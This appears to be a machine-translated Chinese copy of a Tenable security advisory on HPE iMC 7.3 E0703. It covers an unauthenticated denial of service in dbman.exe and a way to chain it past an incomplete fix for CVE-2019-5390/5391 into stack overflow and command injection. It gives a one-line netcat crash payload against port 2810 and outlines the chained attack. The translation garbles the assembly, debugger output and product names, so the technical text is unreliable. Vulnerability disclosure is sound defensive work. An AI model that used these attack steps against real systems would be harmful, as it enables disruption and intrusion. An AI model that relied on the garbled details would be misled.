脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

HPE iMC 7.3 E0703多个漏洞

至关重要的

剧情简介

未经身份验证的远程拒绝服务(DoS)

缺陷存在于CDataConnStreamQueueT:: dbman deal_msg方法。exe c++新运营商与分配用于分配内存大小由攻击者指定:

字。text: 0045 ad95 mov eax, ptr [ebp + var_first4bytes];attacker-controlled。text: 0045 ad98添加eax, 1。text: 0045 ad9b eax推;unsigned int。text: 0045 ad9c电话吗? ?_U@YAPAXI@Z;运营商新的[](单位)

攻击者可以指定一个大(即分配大小。,0 dbman xfffffff0)通过发送以下数据:

echo - ne ' \ xff \ xff \ xff \ x00 |数控
               2810年

这可能会导致一个异常抛出的新的操作符:

0:005 > g (1 b0c.1ab4): c++呃例外——代码e06d7363(第一次)(1 b0c.1ab4): c++呃异常代码e06d7363 (! ! !第二次机会!)eax = 0257 d7c8 ebx = 00000021连成一片= 00000021 edx = 00000000 esi = 7448 c164 edi = 00000000 eip = 7629 c1a2 esp = 0257 d7c8 ebp = 0257 d824 iopl = 0 nv了ei pl新西兰ac阿宝数控c = 0023 ss = 002 b d = 002 b es = 002 fs = 0053 gs = 002 b英语= 00000212 KERNELBASE !RaiseException + 0 x62: 7629 c1a2 8 b4c2454 mov连成一片,dword ptr [esp + 54 h] ss: 002 b: 0257 d81c = 339 b14f7 0:001 > kb # ChildEBP RetAddr Args儿童00 0257 d824 7444 df60 e06d7363 00000001 00000003 KERNELBASE !RaiseException + 0 x62 01 0257 d85c 74453使用efd 0257 d86c 7447 d604 743 f2a10 MSVCR90 !_CxxThrowException + 0 x48 [f: \ dd \ vctools \ crt_bld crt \ prebuild \嗯\ \ self_x86 \。cpp @ 161] 0045 02 0257 d878 ada1 ffffff01 45 e63853 00000000 MSVCR90 !运营商新+ 0 x64 [f: \ dd \ vctools crt \ src \ crt_bld \ self_x86 \ \新。cpp @ 63]警告:堆栈解除信息不可用。后帧可能是错误的。03 0257 fd38 00461415 02320628 00461415 004 c7144 dbman + 0 x5ada1 04 0257 fd4c 70 e7c3c9 00000218 00000054 00000218 dbman x61415 + 0

和dbman过程没有出现处理异常,导致过程终止。

不完整的修复cve - 2019 - 5390和cve - 2019 - 5391

这些漏洞的根本原因并不在7.3 E0703解决。

在开发场景中,攻击者会首先发送一个命令10018 (dbman。conf变量注入)命令10000 (dbman紧随其后。conf重载)。这将是足以引发堆栈溢出。然而,命令注入额外的命令10002必须送到触发一个备份。

HPE iMC E0703 7.3版引入变更执行命令10000年和10002年被加密,同时允许加密命令10018。攻击者仍然可以发送一个命令10018 dbman注入配置变量。相依,但他/她不能发送命令10000或10002没有加密密钥。

然而,攻击者可以使用上面描述的DoS脆弱性杀死dbman过程,强制重启。已经观察到在imcsysdm重启是自动发生的。exe如果智能部署监控代理已经开始(可能生产配置)。当修改dbman dbman重启。包含长BackHoseIp变量相依,堆栈缓冲区溢出发生。此外,BackupTime和BackupTimeMinute变量值可以设置在10018请求安排一个自动备份。这是足以引发命令注入。

WinDbg输出:

STATUS_STACK_BUFFER_OVERRUN遇到(990.123 c):打破指令异常,代码80000003(第一次)* * *错误:文件无法找到象征。违约为dbman导出符号。exe - eax = 00000000 ebx = 00000000连成一片= 00000000 edx = 0000002 b esi = 00000000 edi = 00000000 eip = 7631 d74a esp = 0019 a32c ebp = 0019 a3b4 iopl = 0 nv了ei pl zr na pe数控c = 0023 ss = 002 b d = 002 b es = 002 fs = 0053 gs = 002 b英语= 00000246 KERNELBASE !UnhandledExceptionFilter + 0 x5a: 7631 d74a cc int 3 0:000 > kb # ChildEBP RetAddr Args儿童00 0019 a3b4 004 a9859 004 cb258 721993 ca 8 de66c35 KERNELBASE !UnhandledExceptionFilter + 0 x5a警告:堆栈解除信息不可用。后帧可能是错误的。0044年01 0019 a6e8 dabb 0019 a97c 0019 a97c 0019 a998 dbman !std:: _Init_locks::操作符= + 0 xcd1 b068 02 0019 41414141 41414141 41414141 41414141 dbman + 0 x4dabb 03 0019 b06c 41414141 41414141 41414141 41414141 0 x41414141 04 0019 b070 41414141 41414141 41414141 41414141 0 x41414141…和!可采WinDbg扩展命令显示了可采:0:000 > .load毫秒。dll 0:000 >,可利用的!可采1.6.0.0可利用性分类:利用推荐错误标题:可采-异常处理程序链损坏KERNELBASE开始!UnhandledExceptionFilter + 0 x000000000000005a(散列= 0 xdaf335ab.0xf6a1be01)异常处理程序链的腐败被认为是可利用的

解决方案

7.3升级到iMC E0705P02

披露时间表

06/05/2019——漏洞发现。
06/11/2019——HPE安全漏洞披露。90天的日期是09/09/2019。
06/14/2019——HPE回复一条加密的消息。站得住脚的无法解密,并发送HPE公钥。
06/18/2019——站得住脚的PGP关键过期的6/17。HPE发送更新的关键。
06/21/2019——HPE说错误的密钥用于加密原始披露。他们将重新发送他们的关键。此外,他们不能导入我们的关键。
06/24/2019——站得住脚的重新发送PGP公钥和要求HPE的关键。
06/25/2019——HPE发送一个新密钥。
06/25/2019——站得住脚的发送原始披露使用新的钥匙。
06/26/2019——HPE说他们让我们错误的关键。发送另一个关键,要求我们使用前进。
06/26/2019——站得住脚的承认。问我们是否需要重新发送该报告使用新的钥匙。
06/26/2019——HPE要求重新发送新密钥。
06/26/2019——成立的重新发送新密钥。
06/27/2019——HPE分配箱号PSRT110957并将让我们知道行动计划。
07/16/2019——站得住脚的要求更新。
07/30/2019——站得住脚的要求更新。
08/02/2019 - HPE没有目标发布日期。
08/26/2019——站得住脚的要求更新。
09/03/2019——作为专业礼貌,站得住脚的披露日期延长2周。新的披露日期是09/23/2019。
09/17/2019——站得住脚的问HPE是否收到我们的通讯。提醒HPE披露日期不到一个星期。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2019 - 42
CVSSv2基地/时间的分数
10.0/9.0
CVSSv2向量
(AV: N /交流:L /非盟:N / C: C / I: C / A: C)
受影响的产品
HPE iMC 7.3 E0703
风险因素
至关重要的

咨询时间

09/25/2019——最初版本
01/03/2020——添加链接E0705发行说明
02/21/2020——添加链接E0705P02发行说明。更新解决方案/ HPE的指导。

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map